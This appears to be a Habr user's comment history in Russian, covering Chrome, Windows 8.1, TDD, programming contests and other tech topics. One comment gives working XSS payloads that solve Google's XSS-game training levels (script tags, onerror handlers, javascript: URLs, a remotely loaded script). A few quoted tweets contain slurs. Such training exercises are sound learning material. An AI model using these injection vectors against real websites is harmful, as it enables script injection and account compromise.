• Как устроено тестирование фронтенда в Яндекс.Маркете и почему мы отказываемся от еженедельных релизов
    0
    Спасибо за ответ )
  • Как управлять часами? Разбор фронтенд-трека второго чемпионата по программированию
    0
    :) Да, сложность, к сожалению, разной бывает, но при решении какой-либо задачки, она переходит в разряд побежденных. И все повторяется снова.
  • Как управлять часами? Разбор фронтенд-трека второго чемпионата по программированию
    0
    Дело в том, что во время самого контеста и во время дополнительного «вирутального контеста» действительно никто не решил 5-ую и 6-ую задачу (судя по таблице положения участников). 5- ую задачу пытались решить, я тоже пытался но больше 11 баллов из 50 не получил.

    После этого, обновление таблицы участников заморозилось. Я решил 6-ую задачу про «Галактического коллектора» (задача про оптимальный перевод стрелок) уже после контеста и дополнительного виртуального контеста, но до публикации этой статьи.

    Думаю тут приводились цифры решений задач не только во время контеста ) а в общем. Что намекает на то, что не стоит расстариваться и продолжать дорешивать задачи. Получаешь очень хороший опыт! Советую :)
  • Как устроено тестирование фронтенда в Яндекс.Маркете и почему мы отказываемся от еженедельных релизов
    0
    А бывает так, что какая либо задача, тесты на которую не стабильны, являлась связной с несколькими другими задачами и релиз приходилось откладывать? Или вы избегаете релизить такой пирог и в один релиз уходит базовая задача, которая подготавливает плацдарм (и не обязательно визуальный) для следующих N задач, а зависимые уходят в другой релиз?
  • Как управлять часами? Разбор фронтенд-трека второго чемпионата по программированию
    0
    Спасибо большое за чемпионат!

    Я в этот раз впервые участвовал. Задачи по фронтенду максимально понравились. Особенно задача про часы и про баркод для котиков! Я не добрался в отведенное время до задачи (F. Задача Framework-часов — она же Галактический коллектор), но затем все же решил ее (получив так же опыт), после чемпионата. Спасибо большое за новый опыт!

    Ну а теперь, после публикации решений в этой статье, у меня будет возможность поглядеть на свои ошибки в «Пандемии Вируса» — это единственная задачка, которую не осилил при дорешивании задач, после завершения чемпионата. Это уникальный опыт для меня. Задачи дают примерное направление, с чем придется столкнуться в работе фронтендером в Яндекс.

    Очень помогают узнать реальный уровень и увидеть свои недостатки. Если бы еще почаще бы такие классные чемпионаты проводились, было бы вообще круто!

    Спасибо команде Яндекс, тем кто подготовил эти задачи, протестировал их и тем кто поддерживает платформу Яндекс.Контест
  • За гранью хакерских возможностей
    +5
    Тоже с нетерпением жду, когда начнется 10-ая версия лаборатории, от Pentestit! Огромное спасибо за Ваш нелегкий труд, в подготовке такого уровня лаборатории!
  • Лаборатория тестирования на проникновение «Test lab v.8»: банк взломан
    0
    Было очень интересно! Спасибо большое за интересные задачи! Поздравляю Zlo, max3raza и Nijat с победой! Вы молодцы ребята! Горжусь!
  • Как я проходил первый хак квест CTF Ratazana
    0
    К сожалению, уже не получится его пройти, так как хак квест уже завершен. Он проходил в период с 29 апреля по 7 мая. Похоже все сервисы и сам сайт свернули. Сожалею.
    Сайт организаторов cis.kg
  • Новое обновление Microsoft KB2993651 тоже может вызывать BSOD
    0
    Полет нормальный Win 8.1 (лицензия) Установлено обновление 28.08.2014, нотник постоянно включен, BSOD не наблюдаю. Обновления ставятся автоматически.

    image
  • 64-битный Chrome вышел в релиз
    0
    А Вы чередуйте, немного работайте в браузере со сглаживанием, немного без. А там глядишь привыкните к сглаженному шрифту :) и все будет нормально восприниматься. Новое всегда привносит смуту.
  • 64-битный Chrome вышел в релиз
    +1
    Тогда можно просто попробовать отрубить DirectWrite (это экспериментальный движок рендеринга шрифтов)
    Перейти на страницу chrome://flags/
    Активировать пункт «disable DirectWrite»
  • 64-битный Chrome вышел в релиз
    0
    Понятно, значит не пофиксили. Хотя было упомянуто что это пофиксят в 37M, но как видим наименование канала так и остается странным.
  • 64-битный Chrome вышел в релиз
    0
    Можно добавить следующие параметры старта chrome "****/chrome.exe" /high-dpi-support=1 /force-device-scale-factor=1 возможно поможет. Затем перезапустить chrome.
  • 64-битный Chrome вышел в релиз
    0
    У меня после установки x64 версии, в окне «О программе» отображается «Версия 37.0.2062.94 unknown-m (64-bit)».
    Обновился тоже нормально, x86 версию не удалял, просто закрыл браузер и запустил установку x64 версии. Все закладки и профиль сохранены. Полет нормальный!
  • XSS-game от Google
    +1
    И в общем-то за решение данных уровней никто не выдает ценных призов или признания. Я к примеру когда увидел статью на хабре, понесся решать задачки и не смотрел в комментарии. Как только решил задачи, пошел читать комментарии, было интересно посмотреть как решали другие. Вот и все. Я не хотел никому навредить или отбить желание решать задачки. В следующий раз буду знать, что выкладывать решения тут не стоит. Извините.
  • XSS-game от Google
    –2
    Ну а что тут необычного? Вместо того, чтобы отправлять сообщение в чат, проще править одно сообщение, которое хранится в LocalStorage. В LocalStorage хранится массив объектов сообщений, в начале оно там одно. Вот и можно спокойненько подобрать нужный вектор. При этом обновлять страничку, чтобы приложение чата брало уже измененное сообщение из LocalStorage. Просто мне так было удобнее.
  • XSS-game от Google
    0
    Задания действительно легкие, но просто хотелось поделиться своими решениями, хоть они может быть и будут похоже на решения остальных. Совсем не хотел чтобы это выглядело как «не спортивное поведение». Раз это тема информационной безопасности, то было бы классно рассмотреть решения каждого уровня.
  • XSS-game от Google
    –3
    Ну все, не выдержал! Выкладываю свои решения. Только смотрите после того, как пройдете сами.

    Level1
    https://xss-game.appspot.com/level1/frame?query='+">+<script>alert('XSS!')</script>+"'


    Level2
    Тут нужно править Local Storage ключ postDB и смотреть на изменения HTML маркапа в браузере после обновления содержимого чата
    {"posts":[{"message":"</table><img src='http://localhost/1.jpg' onerror='javascript:alert(123)'","date":1401689467145}]}


    Level3
    https://xss-game.appspot.com/level3/frame#4.jpg' onerror='javascript:alert(123)' /><!--


    Level4
    https://xss-game.appspot.com/level4/frame?timer=')/ alert('123


    Level5
    https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('123')


    Level6
    https://xss-game.appspot.com/level6/frame#//dl.dropboxusercontent.com/s/br98ryrw9fq3c4p/check.js

  • Шпаргалка по шаблонам проектирования
    0
    Вот к примеру, очень хорошо рассматриваются паттерны на dofactory.com в разделе ".NET Design Patterns". Там есть и простые и из реального мира примеры на каждый паттерн :). Я пользуюсь этим ресурсом.
  • Видеообзор Windows 8.1 Preview
    –1
    Просто не очень интуитивно понятно что 0 — это «Никогда» («Never»). Лучше бы как раньше оставили, чтобы был ниспадающий список :) Да и как то я думаю, это лишнее, пользователю, выставлять точное кол-во минут :), достаточно стандартного набора :) 1 мин, 2 мин, 3 мин, 5 мин, 10 мин, 15 мин… 1 ч, 2 ч… Never и т.д. :)
  • Видеообзор Windows 8.1 Preview
    0
    Нет нет, не убрали :) Просто побоялся менять, мало ли все же Preview :). Побоялся ставить в 0 :) Сейчас попробовал, все нормально «Никогда» отображается. Спасибо! :)
  • Видеообзор Windows 8.1 Preview
    0
    Кстати хотел бы заметить одну неприятную особенность. Когда скачиваются, необходимые для обновления данные, с Windows Store (а это порядка 2.44 Гб), то нельзя выходить на рабочий стол, надеяться на то, что будет производится закачка в фоне не получится, скачивание с Windows Store откладывается (приостанавливается). Пришлось даже отключить выключение дисплея, в этом случае тоже приостановка происходила. В общем во время обновления, работать за компом не возможно.

    А так в общем очень хорошие впечатления. Единственно теперь не понятно, как отключать «Выключение жестких дисков», нет опции «No», только возможность установки кол-ва минут, после истечения которых диски уснут.
    В целом управляемость меню стало намного лучше. Появилась моя любимая кнопочка «Пуск». Папки «Документы», «Изображения» и т.д. вынесены в окно эксплорера, при открытии проводника, в окне которого отображается две области. Верхняя с папками «Документы», «Изображения» и т.д., а нижняя с информацией о ваших дисках. Мне показалось очень удобным! Скорость работы IE 11 очень порадовала! В общем я рад выходу Windows 8.1 preview!
  • Видеозаписи докладов с WebCamp 2012 и анонс WebCamp 2013
    0
    Ребята поправьте пожалуйста опечатку на главной странице веб кампа.

    Опечатка в заголовке: «Скидки и промо-коды для актЫвных участников»

    Скрин прикладываю:

  • Покадровые анимации и шейдеры в iOS
    0
    Это мысли у мальчика туда сюда блуждают разные :)
  • Загрузка файлов на сервер в 2012 году
    0
    Спасибо за статью! :)
  • Загрузка файлов на сервер в 2012 году
    +1
    Спасибо большое! Для меня эта тема была актуальна. Я использовал флеш для написания контрола, если флеш не поддерживался показывался стандартный контрол, но вот до такого не додумался. Отлично все работает, особенно превью :)
  • Gamma Gallery — отличная адаптивная галерея
    0
    Я заметил что при изменении ширины окна браузера в сторону уменьшения, картинки плавно уменьшаются и при фиксации размера окна браузера нормально заполняют области. Но вот если увеличивать размер окна, то картинки начинают расширяться и налазить друг на друга :( не очень то смотрится.
    Win8 Chrome 23.0.1271.64 m
  • Web разработка на node.js и express. Глава 2 — тестирование приложения
    0
    Никто не говорил про сложные тесты :) Я лишь говорил про реальные тесты. Да собственно я и не нападал на автора, лишь выразил свое мнение. Я вижу что, статья автора хорошая и ничего не имею ни против автора ни против статьи :) Я лишь указал на недостатки, на которых я посчитал нужным заострить внимание :) Ваше мнение я тоже уважаю :).
    — Теперь все же хочу заострить ваше внимание на проверке работоспособности тестовых (да и любых фреймворков), для их проверки необходимо запускать тесты идущие в репозитории с фреймворком, к примеру у supertest есть тесты проверяющие корректность работы фреймворка. Потому я бы очень хотел, чтобы авторы таких статей все же более правильнее относились к тому, как преподносить информацию. У should.js тоже есть свои тесты, потому что эти фреймворки пишут достаточно грамотные и активные люди.

    Потому будьте профессионалами, не забывайте про назначение тех или иных средств. Не стройте велосипеды с откровенно плохими «проверками» работоспособности. :)

    И опять же судить, о том прав я или нет — Вам! Я не могу что то навязать, я лишь советую.

    Оссу!
  • Web разработка на node.js и express. Глава 2 — тестирование приложения
    0
    Ну извините, если я Вас обидел, честно сказать не хотел. Мне просто всегда говорили, если что то хочешь показать, рассказать продумай все! (совсем все продумать конечно не получается, но минимализировать кол-во ошибок можно). Т.е. Вы понимали, что все таки, то что Вы выложили не совсем корректно, но однако не хотите понять, то что даже для того чтобы пощупать фреймворки, не надо выкладывать откровенно пустой и ничему не учащий код. Я не говорю что Вам надо сразу все показывать, но если Вы решили показать как писать тесты, то лучше бы взяли бы какой нибудь простенький класс на JavaScript и тут показали бы преимущества TDD, но не на тех тестах, которые Вы привели.

    ============================================================================================
    И потом я ничего не услышал в Вашем комментарии по поводу того факта, что Вы указали реализацию app.js и server.js, а потом показали тест на GET запрос (Это явно не в стиле TDD).
    ============================================================================================

    Посмотрите подкасты по TDD и Вы увидите, авторы не делают себе поблажек или осечек или приписки («не хочется сразу все показывать»), они стараются показать пример другим, чтобы людям было приятно посмотреть. И чтобы не было таких вот замечаний по поводу корректности представленного.

    По этому, раз уж заговорили про TDD будьте добры в тексте, показывать шаги: RED, GREEN, REFACTOR касаемо тестируемой сущности (у Вас к сожалению нет ничего такого по отношению к тестированию того же GET запроса на главную страницу. Я вижу единственный тест.).

    А иначе это просто можно назвать «показ того как можно тест написать ради забавы (исследовани возможностей фреймворка)»

    Ну в общем то вывод делать Вам :) Я лишь высказал свое мнение. :) Спасибо что выслушали :)
  • Web разработка на node.js и express. Глава 2 — тестирование приложения
    +1
    Я внимательно читал :) Извиняюсь, если задел своим комментарием, но Вы написали первый и единственные тест после того как указали реализацию app.js и server.js. А должны были для начала написать тест красной полосы именно для проверки GET запроса. Вместо этого вы пишите якобы тесты «true есть true» и «foo не равно bar» — это все к вашему тестовому проекту ну никак не относится. Так что извините, но судя по статье я не очень верю в то, что Вы действительно понимаете что такое TDD. Ничего личного, лишь моя объективная оценка.
  • Web разработка на node.js и express. Глава 2 — тестирование приложения
    +1
    Пусть меня простят хабровчане, но не мог я пройти мимо заголовка «Автоматизированные тесты». Честно сказать, язык не поворачивается назвать тестами, то что предложил автор статьи:

    describe('Truth', function () {
    it('should be true', function () {
    true.should.be.true
    })

    it('should not be false', function () {
    true.should.not.be.false
    })
    })

    и запустим его

    $ ./node_modules/.bin/mocha --require should --reporter spec tests/test.js

    Вполне естественно, что такой тест пройдет, так что заменим его на что-то неработающее

    describe('foo variable', function () {
    it('should equal bar', function () {
    foo.should.equal('bar')
    })
    })

    Если автор хотел показать знание TDD и умение писать тесты, то ему следует все таки в качестве примера приводить реальные тесты, пусть даже для тестового приложения. И у меня честно сказать сложилось впечатление, что автор не понимает что такое TDD. Почему я так подумал, а вот доводы: Во первых TDD не подразумевает написание «липовых» тестов, которые пройдут. Во вторых, не надо писать тест красной полосы только для того чтобы на фейковых данных показать что он не проходит. Это может не правильно трактоваться новичками, кто будет изучать TDD. И потом, не нужно подгонять тест под реализацию, реализация должна подчиняться тесту. Ибо тест — это контракт.
  • С днем программиста!
    0
    Это буква :))))))
  • Godaddy лежит под DDOS
    0
    Так что на основании данных твитов, можно сказать что Anonymous не имеет никакого отношения к данному DDoS, это лишь личная прихоть Own3r
  • Godaddy лежит под DDOS
    +1
    Не знал. Спасибо за ответ.
  • Godaddy лежит под DDOS
    0
    Это жесть! Даже тег не работает :(
  • Godaddy лежит под DDOS
    0
    Так как картинки по каким то загадочным причинам сюда вставить не получается… выкладывают Plain текст :)

    Anonymous Operations: Since @AnonymousOwn3r is getting anal raep, we'd like to announce vacancy for the post of our beloved 134d3r. All newfags & feds may apply.

    Netcake: Watch out… We got a bad ass over here. > @AnonymousOwn3r

    Anonymous Operations: Please redirect your godaddy hate to @AnonymousOwn3r He is the 'leader' of Anonymous and a faggot. #derp Have #lulz with that.
  • Godaddy лежит под DDOS
    0
    Похоже аноны не довольны тем, что некий Own3r объявил себя Security лидером группы и похоже они устроили ему, что то не очень приятное :) Твиты прилагаю. Между прочим аноны указывают на Own3r, что свое негодование по поводу GoDaddy предъявляйте ему :)

  • Скидка до 50% на все продукты JetBrains
    +1
    Посмотрел на скидки, на популярные продукты меньше 50% скидку дают.
    Например ReSharper без скидки стоит $199, а со скидкой $149 и это 26% скидка
    Зато на PhpStorm: стоит $99, со скидкой получается $49 а тут примерно 50% скидка получается :)
  • Отслеживание изменений в свойствах Js объекта с использованием dirtyFlag из пакета KoLite
    +1
    Обязательно попробуйте, я вот к сожалению не додумался до такой реализации проверки на изменения. Посмотрев код dirtyFlag был приятно удивлен, простотой и в тоже время функциональностью :)
  • Решение проблемы установки Cloud9 ide на Ubuntu 12.04
    0
    Не знаю, я провел эксперимент, убрал папки пакетов, socket.io и socket.io-client, которых не хватало и запустил команду npm install -d, но после ее запуска и завершения не обнаружил эти пакеты в папке node_modules. Так что эта команда не помогает в решении проблемы отсутствующих пакетов (даже npm) в текущей ситуации. Если мы заглянем внутрь файл package.json, то увидим внутри, в разделе mappings, следующие строчки

    «vfs»: [«npm», «github.com/c9/vfs/tarball/61841e99eda6ea9a8b801fd145b9a0af286ad324»],
    «vfs-architect»:[«npm», «github.com/c9/vfs-architect/tarball/43bd19b9e7b2ddb95bdc1116143ce7fb22c6a5d3»],
    «treehugger»: [«npm», «github.com/ajaxorg/treehugger/tarball/8026fea03e87a5a773e87ae9d78e29fab912d52e»],
    «socket.io»: [«npm», «github.com/ajaxorg/socket.io/tarball/7aa252bab49e6bbc314dc2678b108b6e0876007a»],
    «socket.io-client»: [«npm», «github.com/ajaxorg/socket.io-client/tarball/35f0763ffcaa7ccc3c664460667577e77da82b10»]

    судя по всему данные настройки, может обрабатывать sm менеджер. Но при помощи чистого npm не получится получить эти пакеты, даже с опцией -d. Я проверил сам это утверждение, убрав пакеты: treehugger, vfs-architect, socket.io, socket.io-client и при запуске команды, она не подтянула эти пакеты. В общем вот такие вот выводы.